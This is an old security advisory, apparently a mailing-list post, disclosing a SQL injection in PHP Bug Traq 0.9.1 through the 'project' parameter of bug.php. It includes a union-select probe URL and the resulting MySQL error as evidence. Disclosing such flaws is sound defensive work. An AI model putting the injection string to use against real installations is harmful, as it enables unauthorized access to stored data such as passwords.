<<< Date Index >>>     <<< Thread Index >>>

SQL Injection in phpBT (bug.php - Add)




 _   _                ______           _    
| | | |               |  _  \         | |   
| |_| | _____      __ | | | |__ _ _ __| | __
|  _  |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V  V /  | |/ / (_| | |  |   < 
\_| |_/\___/ \_/\_/   |___/ \__,_|_|  |_|\_\

http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date:   November 13, 2004
URL:    http://www.howdark.com

Affected Software:              PHP Bug Traq
Software Version:               0.9.1
Software URL:           http://phpbt.sourceforge.net/

Attack:                 SQL Injection, allowing people to minipulate the query 
into pulling data
                        they should not previously be able too obtain. (Such as 
passwords)


Description:            project variable is left open..

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

When forms come up for you to add a bug, the project selection is open
to sql injection.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

bug.php?op=add&project=
bug.php?op=add&project=0%20union%20select%201

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

DB Error: syntax error
select project_name from project where project_id = \' [nativecode=1064 ** You 
have an error in your SQL syntax. Check the manual that corresponds to your 
MySQL server version for the right syntax to use near '\'' at line 1]

----------------------------------------------------------------------------------------------------------------------------------

xxx

;eof

Regards to The Angel ;p
Jerome - The Watcher